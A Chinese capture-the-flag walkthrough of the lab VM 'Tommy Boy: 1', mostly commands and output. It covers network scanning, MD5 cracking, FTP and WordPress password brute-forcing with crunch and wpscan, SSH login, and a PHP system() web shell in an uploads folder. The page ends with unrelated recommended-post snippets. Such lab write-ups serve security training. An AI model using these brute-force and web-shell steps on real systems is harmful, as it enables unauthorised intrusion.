红队打靶练习:TOMMY BOY: 1

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

WEB

robots.txt

get flag1

get flag2

FTP登录

文件下载

更改代理

ffuf爆破

get flag3

crunch密码生成

wpscan

1、密码爆破

2、登录wordpress

ssh登录

get flag4

信息收集

get flag5

信息收集

1、arp

┌──(root㉿ru)-[~/kali/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1   00:50:56:c0:00:08       VMware, Inc.
192.168.135.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.135.133 00:50:56:27:e4:6b       VMware, Inc.
192.168.135.254 00:50:56:e7:82:17       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.372 seconds (107.93 hosts/sec). 4 responded

2、nmap

端口探测

┌──(root㉿ru)-[~/kali/lianxi]
└─# cat port.list
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 13:48 CST
Nmap scan report for 192.168.135.133
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8008/tcp open  http
MAC Address: 00:50:56:27:E4:6B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

┌──(root㉿ru)-[~/kali/lianxi]
└─# cat port.list | head -n 8 | tail -n 3 | awk -F "/" '{print $1}' | xargs -n 3 | sed 's/ /,/g'
22,80,8008

信息探测

┌──(root㉿ru)-[~/kali/lianxi]
└─# nmap -sC -sV -O -A -p 22,80,8008 192.168.135.133 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 13:53 CST
Nmap scan report for 192.168.135.133
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|   256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
|_  256 56:9e:71:2a:a3:83:ff:63:11:7e:94:08:dd:28:1d:46 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to Callahan Auto
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
MAC Address: 00:50:56:27:E4:6B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.135.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

3、nikto

┌──(root㉿ru)-[~/kali/lianxi]
└─# nikto -h http://192.168.135.133
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.135.133
+ Target Hostname:    192.168.135.133
+ Target Port:        80
+ Start Time:         2024-01-10 13:56:04 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /webcgi/: Directory indexing found.
+ /cgi/: Directory indexing found.
+ /cgi-bin/: Directory indexing found.
+ /cgi-sys/: Directory indexing found.
+ /cgibin/: Directory indexing found.
+ /cgi-win/: Directory indexing found.
+ /fcgi-bin/: Directory indexing found.
+ /cgi-exe/: Directory indexing found.
+ /lukeiamyourfather/: Directory indexing found.
+ /robots.txt: Entry '/lukeiamyourfather/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/flag-numero-uno.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /lookalivelowbridge/: Directory indexing found.
+ /robots.txt: Entry '/lookalivelowbridge/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 4 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /aspnet_client: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649


......

4、whatweb

┌──(root㉿ru)-[~/kali/lianxi]
└─# whatweb -v http://192.168.135.133
WhatWeb report for http://192.168.135.133
Status    : 200 OK
Title     : Welcome to Callahan Auto
IP        : 192.168.135.133
Country   : RESERVED, ZZ

Summary   : Apache[2.4.18], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.18 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.18 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 10 Jan 2024 05:56:37 GMT
        Server: Apache/2.4.18 (Ubuntu)
        Last-Modified: Fri, 08 Jul 2016 13:24:23 GMT
        ETag: "498-5371fb88ff1d8-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 652
        Connection: close
        Content-Type: text/html

WEB

翻译：


欢迎来到卡拉汉汽车公司！
系统错误！
如果你读到这篇文章，卡拉汉汽车公司的客户订购系统就坏了。请立即还原备份副本。
请咨询IT部门的Nick以获得帮助。

robots.txt

发现存在robots.txt 文件！

并且存在几个目录！

get flag1

┌──(root㉿ru)-[~/kali/lianxi]
└─# curl http://192.168.135.133/flag-numero-uno.txt
This is the first of five flags in the Callhan Auto server.  You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

翻译：

这是CallhanAuto服务器中五个标志中的第一个。你需要全部解锁
最后的宝藏和充分考虑虚拟机pwned！
标志数据：B34rcl4ws

另外的几个目录里都是图片。把图片下载到本地，经过分析啥也没有！

get flag2

源码：翻译

给了个视频网站！

找到了所谓的名称  --  prehistoricforest

okok,拿到了第二个flag！

Flag data: Z4l1nsky

下载到本地


┌──(root㉿ru)-[~/kali/lianxi]
└─# strings shockedrichard.jpg | head -n 30
JFIF
Exif
Google
Copyright
 1995 Paramount Pictures Corporation. Credit:
 1995 Paramount Pictures / Courtesy: Pyxurz.
0220
ASCII
ce154b5a8e59c89732bc25d6a2e6b90b
8http://ns.adobe.com/xap/1.0/



 
  
   
    Copyright
 1995 Paramount Pictures Corporation. Credit:
 1995 Paramount Pictures / Courtesy: Pyxurz.
   
  
 
 
  Google

发现md5值：ce154b5a8e59c89732bc25d6a2e6b90b

使用hashcat破解

hashcat -m 0 -a 0 ce154b5a8e59c89732bc25d6a2e6b90b --wordlist=/usr/share/wordlists/rockyou.txt


密码就是spanky

输入密码后，出现一篇文章！

翻译：

Michelle/Tommy，
这太夸张了。
我目前正在恢复公司的在线订购系统，但我们在从备份中恢复系统时遇到了一些问题。不幸的是，只有大汤姆拥有登录系统的密码。我在任何地方都找不到他的密码。到目前为止，我能找到的只有我们的IT人员Nick（他的最后一天是昨天）的一张纸条，上面写着：
嗨，Richy，
所以你让我把我所知道的关于卡拉汉服务器的一切都写下来，这样下一个被雇来支持你们这些白痴的白痴就能更快地跟上进度。
以下是我所知道的一切：
你们都是无望的绵羊：-/
卡拉汉汽车网站通常相当稳定。但是，如果由于某种原因，页面被关闭，你们可能会倒闭。但是，多亏了*me*，有一个名为callahanbak.bak的备份，您只需将其重命名为index.html，一切都会恢复正常。
重要提示：您必须通过SSH在Big Tom的帐户下执行此操作才能执行此恢复。警告：大汤姆总是忘记他的帐户密码。警告#2：当我在服务器上创建他的系统帐户时，我把它搞砸了，所以它不应该被称为什么。呃，我记不清了（不在乎），但只要看看系统上的用户列表，你就会明白的。
我在我的主文件夹中留下了一些其他信息，新人可以通过FTP访问这些信息。哦，除了我应该提到的FTP服务器非常脆弱，我还没有时间（也就是说，我不在乎）来修复它。基本上我无法在标准端口上运行它，所以我把它放在大多数扫描仪都会筋疲力尽的端口上。为了让事情变得更有趣，服务器似乎在一小时的顶部联机15分钟，然后停机15分钟，再上升，再下降。现在这是别人的问题了（我有没有说过我一点都不在乎？）。
你让我把我的服务器帐户密码留给你，我没有当着你的面笑（这就是我想做的），而是把我的帐户（“nickburns”，以防你很笨，记不住了）重置为一个非常容易猜的密码。我删除了SSH访问权限，因为我不希望你在紧急情况下给我打电话。但我的信誉仍然适用于FTP。你的新鲜鱼可以使用我的证书连接，如果他/她有半个大脑的话。
祝你好运，笨蛋！
英雄联盟
-尼克
米歇尔/汤米…我们要做什么WTF？！？！如果此网站关闭，我们将停业！！！1.1.
-Richard

1、可以使用Big Tom的主目录中的备份文件Callahanbak.bak恢复Callahan Auto的网站。
2、只需要在Big Tom的帐户下完成第一，但是Big Tom总是忘记他的密码，正如我们以前在Big Tom中看到的那样，将他的SSH证书的第二部分保存在草稿博客中
3.Nick的FTP下还有其他信息，但FTP服务器并不总是在线（上15分钟，下15分钟然后循环）
4.Nick只是使用容易猜到的密码重设了FTP帐户名nickburns，并且已经删除了SSH帐户

FTP登录

文件下载

┌──(root㉿ru)-[~/kali/lianxi]
└─# ftp
ftp> open 192.168.135.133 65534
Connected to 192.168.135.133.
220 Callahan_FTP_Server 1.3.5
Name (192.168.135.133:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to I
ftp> ls -al
229 Entering Extended Passive Mode (|||16455|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 nickburns nickburns     4096 Jul 20  2016 .
drwxr-x---   4 nickburns nickburns     4096 Jul 20  2016 ..
-rw-r--r--   1 root     root            0 Jul 21  2016 .bash_history
drwx------   2 nickburns nickburns     4096 Jul  6  2016 .cache
drwxrwxr-x   2 nickburns nickburns     4096 Jul  6  2016 .nano
-rw-rw-r--   1 nickburns nickburns      977 Jul 15  2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||23092|)
150 Opening BINARY mode data connection for readme.txt (977 bytes)
100% |******************************************************************************************************************************************************|   977        7.63 MiB/s    00:00 ETA
226 Transfer complete
977 bytes received in 00:00 (414.64 KiB/s)

根据上面的提示，用户名为nickburns，密码也是nickburns。一个简单的密码本身就可以是用户名！

翻译：

致我的替代者：
如果你正在阅读这篇文章，你将面临一项不幸的工作，那就是承担IT责任
我在卡拉汉汽车公司。哈哈哈哈！笨蛋！这是有史以来最糟糕的工作！你会的
整天被愚蠢的猴子包围，他们几乎不会按Ctrl+P键，也不会使用传真机
从火焰喷射器！
不管怎样，我并不是完全没有怜悯之心。此服务器上有一个名为“NickIzL33t”的子文件夹
在某处多年来，我一直把它作为公司的个人邮箱。呵呵。大声笑。
我把它清理干净了（没有顽皮的小精灵！）但如果你需要一个地方来倾倒你想要的东西
以后在你的手机上看，把那个文件夹当作我送给你的礼物。
哦，顺便说一句，大汤姆是个白痴，总是忘记密码，所以我做了一个加密的
.zip的密码，并将其放在“NickIzL33t”文件夹中。但你猜怎么着？
他也总是忘记那个密码。幸运的是，我是个好人，给他留了一张提示单。
祝你好运，笨蛋！
大声笑。
-尼克

还有一个文件！我们访问一下！

更改代理

在80端口访问不到！只能在8008端口访问！

我发现它在谈论 iPhone！从 iPhone 上，我们可以访问此服务器！我们可以去 burp 并更改用户代理为iOS！

1、正常抓包

2、改为ios代理

3、放包

翻译：


你通过了模拟测试
但是尼克的秘密之门并不是那么容易打开的。
必须知道.html的确切名称才能闯入这座堡垒。
祝你好运。
英雄联盟
-尼克

看来还需要找到一个后缀为html文件才行！

ffuf爆破

很可疑，尝试访问！

访问成功！

翻译：

大汤姆，
你的密码库是用（是的，你猜对了）一个密码保护的！
因为你选择了愚蠢的密码，比如“password123”和“brakepad”I
对您强制执行了新的密码要求。。。13个字符宝贝！哈哈哈哈！！！
你的密码是你妻子的昵称“bev”（注意，它都是小写的）加上以下内容：
*一个大写字符
*两个数字
*两个小写字符
*一个符号
*《汤米男孩》上映的那一年
是的，胖子，有很多键要按，但一定要把它们全部输入一个
大块好吗？呵呵，“大块”。大块打字大块。这很有趣。
英雄联盟
-尼克


又来恶心我！

你的密码是你妻子的昵称“bev”（注意，它都是小写的）加上以下内容：
*一个大写字符
*两个数字
*两个小写字符
*一个符号
*《汤米男孩》上映的那一年

需要生成一个满足几个条件的密码！

get flag3

第三个可点击链接是个下载链接！

Flag data: TinyHead

需要密码，看来需要我们找到密码才行！

crunch密码生成

密码满足条件：

你的密码是你妻子的昵称“bev”（注意，它都是小写的）加上以下内容：
*一个大写字符
*两个数字
*两个小写字符
*一个符号
*《汤米男孩》上映的那一年

上线时间为：1995年

1、payload
crunch 13 13 -t bev,%%@@^1995 -o dic.txt

2、
┌──(root㉿ru)-[~/kali/lianxi]
└─# crunch 13 13 -t bev,%%@@^1995 -o dic.txt
Crunch will now generate the following amount of data: 812011200 bytes774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800

crunch:  97% completed generating output

crunch: 100% completed generating output




3、参数解释：

13 13：一共只有13位
-t:指定类型
bev：条件
，：大写字符
%%：两个数字
@@：两个小写字符
^：符号
1995：条件

差不多爆破十分钟左右！密码就出来了！  --- bevH00tr$1995

解压一下

┌──(root㉿ru)-[~/kali/lianxi]
└─# unzip t0msp4ssw0rdz.zip
Archive:  t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
  inflating: passwords.txt

┌──(root㉿ru)-[~/kali/lianxi]
└─# cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

得到几个账户以及密码！

Username: BigTommyC
Password: money

Username: TomC
Password: wedding

Username: bigtommysenior
Password: fatguyinalittlecoat   他的密码缺少数字！真是麻烦！

Username: bigtom(I think?)
Password: ???

wpscan

1、密码爆破

wpscan --url http://192.168.135.133/prehistoricforest/wp-login.php -e u



[i] User(s) Identified:

[+] tommy
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] richard
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Tom Jr.
 | Found By: Rss Generator (Passive Detection)

[+] Big Tom
 | Found By: Rss Generator (Passive Detection)

[+] michelle
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

得到五个用户！

我们分别对五个用户进行密码枚举
wpscan --url http://192.168.135.133/prehistoricforest/ -U tom -P /usr/share/wordlists/rockyou.txt


只有tom可以枚举成功！ 密码是：tomtom1

2、登录wordpress

前面有个账号的密码需要加上数字才对，这个应该就是的！
所以账号密码：bigtommysenior   fatguyinalittlecoat1938!!

ssh登录

get flag4

┌──(root㉿ru)-[~/kali/lianxi]
└─# ssh [email protected]
The authenticity of host '192.168.135.133 (192.168.135.133)' can't be established.
ED25519 key fingerprint is SHA256:uM/HObhtq1QX9XQgJ+tCGJRWnzsQsaouADPEzvD9h2o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.135.133' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

143 packages can be updated.
0 updates are security updates.


Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$ id
uid=1002(bigtommysenior) gid=1002(bigtommysenior) groups=1002(bigtommysenior)
bigtommysenior@CallahanAutoSrv01:~$

Flag data: EditButton


还差一个flag5.

文件的意思是让我们把bak备份文件复制到网站根目录下，并改名位index.html。

bigtommysenior@CallahanAutoSrv01:/var/www/html$ cp /home/bigtommysenior/callahanbak.bak /var/www/html/index.html bigtommysenior@CallahanAutoSrv01:/var/www/html$ cat index.html Welcome to Callahan Auto Welcome to Callahan Auto! SYSTEM STATUS: ONLINE We're happy to be serving all your brakepad needs.

当我们重新访问时，就会发现服务已经上线了！

信息收集

bigtommysenior@CallahanAutoSrv01:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/ubuntu-core-launcher
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/passwd
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/bin/ntfs-3g

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads  


发现存在文件上传的文件！

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
index.html  shell.php
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ vim shell.php
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cat shell.php

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$

先创建一个shell.php，里面先写入php的执行函数system，然后去访问！

get flag5

Flag data: Buttcrack

翻译：

第五面旗帜！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！
你做到了！！！！！！！！！！！！！！！！！！！！！！！！！！！！
哦，理查德，不要逃避你的感情！！！！！！！！
标志数据：Buttcrack
好的，现在你要做的是从每个标志中提取标志数据，并将其分为一大块。
例如，如果标志1数据为“hi”，标志2数据为“there”，标志3数据为“you”
您将创建此blob：
给你
按顺序对所有标志执行此操作，此密码将打开Big Tom的loot.zip
文件夹，您可以调用框PWNED。

根据提示，我们需要按照顺序合并所有的flag

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

这个就是压缩包的密码！

翻译：

YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec



Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

ok！到这里这个靶机就打完了！

这里最让人想不到的就是那个iphone代理了！想半天！

提权的话可以使用脏牛！不过没必要，因为我们已经完成这台靶机的目标了！

你可能感兴趣的:(红队渗透靶机,网络安全)

感恩日志圆施
张新丽2019年8月16日感恩日志：1.感恩天地滋养万物；感恩国家恩惠护佑；感恩父母养育深恩。2.感恩尊重为平台源头付出的所有人事物。3.感恩红斌、孙萍清晨7点开车来接我和小姨去安宁渠采摘。4.感恩小姨和小姨夫亲自采摘还带我们去瓜地品尝，第一次这么吃好甜啊，忘掉了炎热消了暑，拍下了瞬间，分享着快乐，带给大家。4.感恩整理收拾好小姨给大家利用午休蒸苞米。5.感恩去接爸妈参加沙龙。6.感恩祝福两位伙伴
入伏（五）喜马ma
图片发自App入伏13今天我看见很多蜻蜓在飞飞得很低想起小学时学的那点知识在这闷热的午后真能来一场暴雨太过瘾了入伏14有点像瓢虫的昆虫喜欢吃葡萄叶喜欢交配在炎热的夏天如果你在葡萄园看见两只昆虫它们不是在吃葡萄叶就是在交配请记住它们的名字叫葡萄十星红甲
ChatGPT一路狂飙？何鲸洛
2月2日。根据投行瑞银集团在周三发布的一份研究报告。爆红聊天机器人ChatGPT的月活跃用户在今年1月份预计达到了1亿，这距离它推出只有2个月时间，成为史上增长最快的消费者应用。①ChatGPT一路火花带闪电？▽2014年。OpenAI创始人SamAltman早年曾执掌著名的硅谷孵化器YCombinator。2015年。Altman联合马斯克、彼得·泰尔、AWS、印度Infosys和YC等作为出资
网络安全（黑客）——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
黑客（网络安全）技术自学30天一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
Everyday is Mayday | 祝五月天23th成团快乐不在摇滚区
997年3月29日，“SoBand”乐队正式改名为“MayDay”。1999年，刘冠佑正式加入五月天。发行了第首张录音室专辑《五月天第一张创作专辑》。深受英国摇滚乐队披头士的影响，五月天相信摇滚乐拥有可以改变世界的力量，通过摇滚可以将爱与希望传递到每一个角落。五月天的五个人，都不算多有天资。阿信小时候很喜欢唱歌，但是没有很好的天赋。（快来看陈信宏）他说，在小学的时候，他想加入合唱队，但是只唱了两个
东方红鼻孔一佳
历史上的今天，9月9日。毛泽东，伟大的无产阶级革命家。毛泽东（1893年12月26日-1976年9月9日），字润之（原作咏芝，后改润芝），笔名子任。湖南湘潭人。中国人民的领袖，伟大的马克思主义者，伟大的无产阶级革命家、战略家、理论家，中国共产党、中国人民解放军和中华人民共和国的主要缔造者和领导人，马克思主义中国化的伟大开拓者，近代以来中国伟大的爱国者和民族英雄，中国共产党第一代中央领导集体的核心，
虚境朝拾：懂王参加节目秀 2021/07/20 -5 群星璀璨十二时
虚境朝拾：2021/07/20场景5：懂王参加节目秀梦见懂王访华，带着两个手下。他们准备在杭州的即将开始的娱乐节目前秀一把实力。他们是其中一支参赛队。做足了准备。节目开始前，他们显得有些傲慢。比如懂王举着大瓶矿泉水吨吨吨在喝，喝的面红耳赤。其助手之一名校毕业，笔才惊人，然而因仕其主，而被台下观众们感到惋惜。另一个助手也是懂王的忠实的打手，尽管看上去平平无奇。
自学黑客（网络安全）技术——2024最新九九归二 web安全安全学习笔记网络网络安全信息安全
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
什么软件可以改IP地址 bafnpa123 服务器运维
什么软件可以改IP地址在现代网络环境中，有时候我们需要更换IP地址来进行网络操作。IP地址是网络通信的基石，它标识了计算机在互联网上的唯一身份。下面，我将向您介绍几种常见的换IP地址的方法：方法一：使用深度ip转换器ip转换器是一种可以在公共网络上建立加密通道的技术。通过ip转换器，您可以更换您的IP地址，从而隐藏您的真实IP，提高网络安全性。在选择ip转换器服务时，请务必选择信誉良好、速度稳定的
网络安全（黑客技术）—自学德西德西 web安全安全网络安全学习 python 开发语言 php
1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高；二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多（举例）：4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
有趣的体育课李茂旭
有趣的体育课陈庄镇中心小学四(6)班李茂旭上午第三节是体育课，不知道为什么老师不让拿跳绳，说是谁拿跳绳就宰了谁。我心想“今天老师怎么不让拿跳绳了呢？”到了一看，原来是换体育老师了。老师让我们整好队以后到操场跑步，随后就说“想干嘛就干嘛吧这节课自由活动。”我选择了踢足球，踢着踢着鞋子飞出去了，在飞的过程中，它好像跟我说“主人，我要远走高飞了，再见！”玩着玩着，不一会儿就下课了。真是一节有趣的体育课啊
樱花吟暮云成璧
春去春回又一春，春砌琼樱欲销魂。青苞浅道浮香暖，凉蕊羞笑采花人。采花未比游人意，经年此别故人去。半点相思残梦里，几回河绛忆别离。昨夜霜尘冷落花，纤云弄巧月入槎。飞星寄语牛郎岸，冰心未解织女家。踯躅素英凋零处，素英红泥留人住。三月三日三生尽，长恨青冥悠悠诉。推枕复疑夜梦君，暮鼓萧萧花影存。情生暗知他乡雨，轻雷直唤此间人。飘飖举，玉香风，香风梦断是多情。何宵暂醉红笺墨，望尽春光走断鸿。图片发自App
麦吉丽贵妇膏代理多少钱麦吉丽小芹
麦吉丽、麦吉丽贵妇膏、麦吉丽代理、麦吉丽素颜三部曲、贵妇膏详细咨询请添加V信：18688885511国内首个拥有完善代理商管理以及培训系统。旗下四十几款产品，涵盖护肤、彩妆、身体护理、问题肌肤修复护理等方面，其中【素颜三部曲】更是因为被人口碑称赞而迅速蹿红朋友圈及各大微博头条!麦吉丽因其天然、安全有效、高品质立足中国高端护肤品市场，线下专柜体验店遍地开花。大半个娱乐圈明星都在用的护肤佳品。麦吉丽贵
网络安全（黑客技术）—2024自学德西德西开发语言 php 安全 web安全网络安全 python 网络
1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高；二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多（举例）：4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
【Hadoop】使用Scala与Spark连接ClickHouse进行数据处理音乐学家方大刚 Scala Hadoop hadoop scala spark
风不懂不懂得叶的梦月不听不听闻窗里琴声意难穷水不见不曾见绿消红霜不知不知晓将别人怎道珍重落叶有风才敢做一个会飞的梦孤窗有月才敢登高在夜里从容桃花有水才怕身是客身是客此景不能久TieYann(铁阳)、薄彩生《不知晓》在大数据分析和处理领域，ApacheSpark是一个广泛使用的高性能、通用的计算框架，而ClickHouse作为一个高性能的列式数据库，特别适合在线分析处理（OLAP）。结合Scala语
风光正好，一路“黔”行 ——遵义红色文化之行红魂立德
很有幸在遵义红魂立德服务中心参加这次“不忘初心，牢记使命”的遵义红色党建活动，两天的学习，让我深受洗礼，倍感振奋！通过这次革命传统教育，我重温了历史、缅怀了先烈、重温了入党誓词，体味了娄山关战役的悲壮、也为“四渡赤水”拍手叫绝。立于雄关，目收林海，雄关漫道真如铁，而今迈步从头越，共产党人的豪迈和气概已在我的体内升腾，这种红色基因已深深地植入我的灵魂！遵义会议是在红军最危急的时刻召开的，是我们党第一
蓝猴波幅13天觉察记录day2——kin132月亮的黄人 Demi瑶瑶
